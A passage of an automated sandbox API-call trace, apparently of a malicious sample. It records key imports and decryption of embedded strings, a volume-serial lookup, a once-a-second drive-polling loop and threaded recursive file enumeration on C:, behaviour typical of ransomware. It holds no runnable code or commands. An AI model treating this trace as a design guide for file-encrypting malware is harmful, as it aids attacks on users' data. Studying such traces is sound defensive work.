(HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a9070 [0139.895] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x80) returned 0x26a9088 [0139.895] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a9110 [0139.895] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x82) returned 0x26a9128 [0139.895] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a91b8 [0139.895] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x4) returned 0x26a1298 [0139.895] CryptAcquireContextW (in: phProv=0x115fcf4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x115fcf4*=0xaa2d48) returned 1 [0139.897] CryptGenRandom (in: hProv=0xaa2d48, dwLen=0x55, pbBuffer=0x2bafd4a | out: pbBuffer=0x2bafd4a) returned 1 [0139.898] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a91d0 [0139.898] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x80) returned 0x26a91e8 [0139.898] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a93b8 [0139.898] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x2) returned 0x26a1530 [0139.898] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x4) returned 0x26a9478 [0139.898] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a9340 [0139.898] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x80) returned 0x26a9488 [0139.898] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a9358 [0139.898] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x4) returned 0x26a9510 [0139.898] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a1530, Size=0x82) returned 0x26a9520 [0139.898] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a9510, Size=0x100) returned 0x26a95b0 [0139.898] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a92b0 [0139.898] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x82) returned 0x26a96b8 [0139.898] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a9370 [0139.898] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x82) returned 0x26a9748 [0139.898] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a9520, Size=0x104) returned 0x26a97d8 [0139.898] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a95b0, Size=0x200) returned 0x26a98e8 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9478 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a98e8 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9358 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a91e8 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a91d0 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9488 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9340 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a97d8 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a93b8 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a96b8 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a92b0 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9748 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9370 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a4b60 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9038 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9128 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9110 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9088 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9070 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1298 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a91b8 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a4b30 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9050 | out: hHeap=0x26a0000) returned 1 [0139.899] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0xa4) returned 0x26a9038 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12e8 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a7f90 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8fa0 | out: hHeap=0x26a0000) returned 1 [0139.899] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a4b18 | out: hHeap=0x26a0000) returned 1 [0139.899] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x14) returned 0x26a7f90 [0139.899] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0xe) returned 0x26a9400 [0139.899] ResetEvent (hEvent=0x290) returned 1 [0139.899] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1153bdf, lpParameter=0x26a7f90, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x294 [0139.900] CloseHandle (hObject=0x294) returned 1 [0139.900] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a9298 [0139.900] CryptImportKey (in: hProv=0xa968b8, pbData=0x2bafcb8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2bafd20 | out: phKey=0x2bafd20*=0xaa93d0) returned 1 [0139.900] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x2bafd08, dwFlags=0x0) returned 1 [0139.900] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9298, pdwDataLen=0x2bafcd4 | out: pbData=0x26a9298, pdwDataLen=0x2bafcd4) returned 1 [0139.900] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0139.900] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a9418 [0139.900] CryptImportKey (in: hProv=0xa968b8, pbData=0x2bafcb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2bafd18 | out: phKey=0x2bafd18*=0xaa93d0) returned 1 [0139.900] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x2bafd00, dwFlags=0x0) returned 1 [0139.900] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9418, pdwDataLen=0x2bafccc | out: pbData=0x26a9418, pdwDataLen=0x2bafccc) returned 1 [0139.900] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0139.900] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a93a0 [0139.900] CryptImportKey (in: hProv=0xa968b8, pbData=0x2bafca8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2bafd10 | out: phKey=0x2bafd10*=0xaa93d0) returned 1 [0139.900] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x2bafcf8, dwFlags=0x0) returned 1 [0139.900] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a93a0, pdwDataLen=0x2bafcc4 | out: pbData=0x26a93a0, pdwDataLen=0x2bafcc4) returned 1 [0139.900] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0139.900] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a8fa0 [0139.900] CryptImportKey (in: hProv=0xa968b8, pbData=0x2bafca0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2bafd08 | out: phKey=0x2bafd08*=0xaa9450) returned 1 [0139.900] CryptSetKeyParam (hKey=0xaa9450, dwParam=0x1, pbData=0x2bafcf0, dwFlags=0x0) returned 1 [0139.900] CryptDecrypt (in: hKey=0xaa9450, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a8fa0, pdwDataLen=0x2bafcbc | out: pbData=0x26a8fa0, pdwDataLen=0x2bafcbc) returned 1 [0139.901] CryptDestroyKey (hKey=0xaa9450) returned 1 [0139.901] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a9430 [0139.901] CryptImportKey (in: hProv=0xa968b8, pbData=0x2bafc98, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2bafd00 | out: phKey=0x2bafd00*=0xaa93d0) returned 1 [0139.901] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x2bafce8, dwFlags=0x0) returned 1 [0139.901] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9430, pdwDataLen=0x2bafcb4 | out: pbData=0x26a9430, pdwDataLen=0x2bafcb4) returned 1 [0139.901] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0139.901] htonl (hostlong=0xb4197730) returned 0x307719b4 [0139.901] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x20, pbBuffer=0x2bafdc8 | out: pbBuffer=0x2bafdc8) returned 1 [0139.901] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x28) returned 0x26a4b18 [0139.901] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a92b0 [0139.901] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x4) returned 0x26a1298 [0139.901] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x14) returned 0x26a12e8 [0139.901] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a9310 [0139.901] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x80) returned 0x26a90e8 [0139.901] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a9448 [0139.901] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x82) returned 0x26a9170 [0139.901] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a9460 [0139.901] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x4) returned 0x26a9650 [0139.901] CryptGenRandom (in: hProv=0xaa2d48, dwLen=0x55, pbBuffer=0x2bafd4a | out: pbBuffer=0x2bafd4a) returned 1 [0139.901] GetLastError () returned 0x0 [0139.901] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x214) returned 0x26a9680 [0139.901] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74440000 [0139.902] GetCurrentThreadId () returned 0xfcc [0139.902] SetLastError (dwErrCode=0x0) [0139.902] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a93b8 [0139.902] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x80) returned 0x26a98a0 [0139.902] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a9370 [0139.902] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x2) returned 0x26a95e0 [0139.902] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x4) returned 0x26a94a0 [0139.902] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a93d0 [0139.902] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x80) returned 0x26a9928 [0139.902] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a9388 [0139.902] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x4) returned 0x26a9610 [0139.902] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a95e0, Size=0x82) returned 0x26a99b0 [0139.902] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a9610, Size=0x100) returned 0x26a9a40 [0139.902] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a92c8 [0139.902] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x82) returned 0x26a9b48 [0139.902] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a9328 [0139.902] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x82) returned 0x26a9bd8 [0139.902] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a99b0, Size=0x104) returned 0x26a9c68 [0139.902] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a9a40, Size=0x200) returned 0x26a9d78 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a94a0 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d78 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9388 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a98a0 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a93b8 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9928 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a93d0 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9c68 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9370 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9b48 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a92c8 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9bd8 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9328 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1298 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a92b0 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9170 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9448 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a90e8 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9310 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9650 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9460 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a4b18 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12e8 | out: hHeap=0x26a0000) returned 1 [0139.903] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0xa4) returned 0x26a90e8 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9418 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a93a0 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8fa0 | out: hHeap=0x26a0000) returned 1 [0139.903] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9430 | out: hHeap=0x26a0000) returned 1 [0139.903] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x14) returned 0x26a12e8 [0139.903] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0xe) returned 0x26a9430 [0139.903] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1153bdf, lpParameter=0x26a12e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x294 [0139.904] CloseHandle (hObject=0x294) returned 1 [0139.904] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0xffffffff) Thread: id = 114 os_tid = 0xfd0 [0139.904] GetLogicalDrives () returned 0x4 [0139.904] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a88b0 [0139.904] CryptImportKey (in: hProv=0xa968b8, pbData=0x2cef8e4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2cef94c | out: phKey=0x2cef94c*=0xaa9010) returned 1 [0139.904] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x2cef934, dwFlags=0x0) returned 1 [0139.904] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a88b0, pdwDataLen=0x2cef900 | out: pbData=0x26a88b0, pdwDataLen=0x2cef900) returned 1 [0139.904] CryptDestroyKey (hKey=0xaa9010) returned 1 [0139.905] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a8ae0 [0139.905] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a89a0 [0139.905] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a8fa0 [0139.905] CryptImportKey (in: hProv=0xa968b8, pbData=0x2cef8bc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2cef924 | out: phKey=0x2cef924*=0xaa9010) returned 1 [0139.905] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x2cef90c, dwFlags=0x0) returned 1 [0139.905] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a8fa0, pdwDataLen=0x2cef8d8 | out: pbData=0x26a8fa0, pdwDataLen=0x2cef8d8) returned 1 [0139.905] CryptDestroyKey (hKey=0xaa9010) returned 1 [0139.905] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8fa0 | out: hHeap=0x26a0000) returned 1 [0139.905] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a8ae0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0139.905] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a89a0 | out: hHeap=0x26a0000) returned 1 [0139.905] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a88b0 | out: hHeap=0x26a0000) returned 1 [0139.905] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2cef98c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2cef98c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0139.905] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8ae0 | out: hHeap=0x26a0000) returned 1 [0139.905] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a4b18 [0139.905] CryptImportKey (in: hProv=0xa968b8, pbData=0x2cef918, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2cef980 | out: phKey=0x2cef980*=0xaa91d0) returned 1 [0139.905] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x2cef968, dwFlags=0x0) returned 1 [0139.905] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a4b18, pdwDataLen=0x2cef934 | out: pbData=0x26a4b18, pdwDataLen=0x2cef934) returned 1 [0139.905] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0139.905] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x28) returned 0x26a8fa0 [0139.905] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x294 [0139.905] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x298 [0139.905] GetLogicalDrives () returned 0x4 [0139.906] Sleep (dwMilliseconds=0x3e8) [0141.111] GetLogicalDrives () returned 0x4 [0141.111] Sleep (dwMilliseconds=0x3e8) [0142.402] GetLogicalDrives () returned 0x4 [0142.402] Sleep (dwMilliseconds=0x3e8) [0143.655] GetLogicalDrives () returned 0x4 [0143.655] Sleep (dwMilliseconds=0x3e8) [0144.983] GetLogicalDrives () returned 0x4 [0144.983] Sleep (dwMilliseconds=0x3e8) [0146.202] GetLogicalDrives () returned 0x4 [0146.202] Sleep (dwMilliseconds=0x3e8) [0147.476] GetLogicalDrives () returned 0x4 [0147.476] Sleep (dwMilliseconds=0x3e8) [0148.795] GetLogicalDrives () returned 0x4 [0148.795] Sleep (dwMilliseconds=0x3e8) [0150.066] GetLogicalDrives () returned 0x4 [0150.066] Sleep (dwMilliseconds=0x3e8) [0151.267] GetLogicalDrives () returned 0x4 [0151.267] Sleep (dwMilliseconds=0x3e8) [0152.572] GetLogicalDrives () returned 0x4 [0152.578] Sleep (dwMilliseconds=0x3e8) [0153.655] GetLogicalDrives () returned 0x4 [0153.657] Sleep (dwMilliseconds=0x3e8) Thread: id = 115 os_tid = 0xfd4 [0139.978] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x38) returned 0x26a8fd0 [0139.978] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x18) returned 0x26a9010 [0139.978] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x288 [0139.978] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x29c [0139.978] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x2a0 [0139.978] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x3070048 [0139.979] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x1153a08, lpParameter=0x2f2fd00, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a4 [0139.979] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x1153a08, lpParameter=0x2f2fd00, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a8 [0139.980] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x3080050 [0139.980] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x2f2fa74 | out: lpFindFileData=0x2f2fa74*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x26a0000, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0xaa9010 [0139.981] GetLastError () returned 0x0 [0139.981] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x214) returned 0x26a98a0 [0139.981] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74440000 [0139.981] GetCurrentThreadId () returned 0xfd4 [0139.981] SetLastError (dwErrCode=0x0) [0139.981] GetLastError () returned 0x0 [0139.981] SetLastError (dwErrCode=0x0) [0139.981] GetLastError () returned 0x0 [0139.981] SetLastError (dwErrCode=0x0) [0139.981] GetLastError () returned 0x0 [0139.981] SetLastError (dwErrCode=0x0) [0139.981] GetLastError () returned 0x0 [0139.981] SetLastError (dwErrCode=0x0) [0139.982] GetLastError () returned 0x0 [0139.982] SetLastError (dwErrCode=0x0) [0139.982] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x3090058 [0139.982] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\*", lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName=".", cAlternateFileName="")) returned 0xaa93d0 [0139.982] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="..", cAlternateFileName="")) returned 1 [0139.982] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="Logs", cAlternateFileName="")) returned 1 [0139.982] GetLastError () returned 0x0 [0139.982] SetLastError (dwErrCode=0x0) [0139.982] GetLastError () returned 0x0 [0139.982] SetLastError (dwErrCode=0x0) [0139.983] GetLastError () returned 0x0 [0139.983] SetLastError (dwErrCode=0x0) [0139.983] GetLastError () returned 0x0 [0139.983] SetLastError (dwErrCode=0x0) [0139.983] GetLastError () returned 0x0 [0139.983] 